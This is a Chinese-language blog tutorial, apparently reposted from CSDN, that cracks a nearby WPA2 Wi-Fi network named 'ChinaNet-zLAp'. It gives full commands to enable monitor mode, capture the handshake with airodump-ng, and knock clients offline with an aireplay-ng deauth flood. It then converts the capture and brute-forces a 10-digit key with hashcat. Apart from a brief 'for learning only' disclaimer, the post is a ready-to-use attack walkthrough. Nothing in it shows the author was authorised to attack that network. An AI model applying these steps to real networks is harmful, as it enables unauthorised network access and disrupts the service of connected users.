0


Kali Aircrack-NG HashCat 破解Wi-Fi密码

Kali Aircrack-NG HashCat 破解Wi-Fi密码

假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试
仅学习使用

1.设备概要

2.破解WPA/WPA2类WI-FI操作(Root下操作):

用Parallels Desktop 安装Kali Linux,并且接入无线网卡

2.1查看可用无线网卡

airmon-ng

在这里插入图片描述

2.2启用网卡监听模式

airmon-ng start wlan0

使用

iwconfig

确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor

在这里插入图片描述

2.3扫描周围Wi-Fi

airodump-ng wlan0mon
BSSID -- Wi-Fi的Mac地址
PWR -- 信号强度
Data -- 监听期间流量总和
CH -- WI-FI所用信道
ENC -- 加密算法
ESSID -- Wi-Fi名称
  • 看到需要破解的WI-FI按下Ctrl +C 终止 我们的目标名是 ChinaNet-zLAp``````BSSID : 8C:53:C3:DA:77:F7 CH : 6

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EGjssNUT-1652855895563)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a16223c7-251a-4e00-9911-e0ff3d6cb24b/Untitled.png)]

2.4抓取握手包并保存为CAP文件

airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值# -c 指定要破解的Wi-Fi的信道# -w 捕获到的握手包文件名

在这里插入图片描述

2.5 主动对设备断网获取握手包

上一步中我们是被动等待
(以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)

但对于上面已经连上Wi-Fi的设备,我们可以使用

aireplay-ng

进行

deauth洪水攻击

使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包

保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):

aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示断开设备连接# 10 表示deauth攻击次数# -a 为Wi-Fi的BSSID# -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址

在这里插入图片描述

上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)

如图所示,我们已经抓到了重新认证的

28:6C:07:29:D9:A2

的握手包,使用

Ctrl +C

终止抓包

在这里插入图片描述

此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)

在这里插入图片描述

3.暴力破解CAP文件

字典配合

Aircrack-ng

效率有点低(CPU破解),所以我们使用

HashCat

(GPU)破解

WPA/WPA2

的握手包

由于

HashCat

无法直接破解

CAP

文件,所以我们得将其转化为

HCCAPX

文件

去官网转换,https://hashcat.net/cap2hccapx/ 如图

在这里插入图片描述

或者使用工具(hashcat-utils的cap2hccapx):

下载地址:https://github.com/hashcat/hashcat-utils/releases/

cd hashcat-utils-1.9/bin &&chmod +x cap2hccapx.bin

将CAP文件转化为HCCAPX文件:

在这里插入图片描述

  • 因为抓包了好几次,所以这里出现3个,只要有其中的一个就可以了,如果没有,那就是抓包失败了

3.1使用HashCat破解

  • 找了一台有独显的笔记本,MacBook核显计算??..
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"# -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)]# -m 2500 破解WPA2 hccapx文件#'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下:# ? | Charset#  ===+=========#   l | abcdefghijklmnopqrstuvwxyz#   u | ABCDEFGHIJKLMNOPQRSTUVWXYZ#   d | 0123456789#   h | 0123456789abcdef#   H | 0123456789ABCDEF#   s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~#   a | ?l?u?d?s

按下’s’了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)

在这里插入图片描述
过了很久,密码破解成功,如图:
在这里插入图片描述

标签: 安全 linux 网络

本文转载自: https://blog.csdn.net/VOLTAGE3412/article/details/124841979
版权归原作者 ztfot 所有, 如有侵权,请联系我们删除。

“Kali Aircrack-NG HashCat 破解Wi-Fi密码”的评论:

还没有评论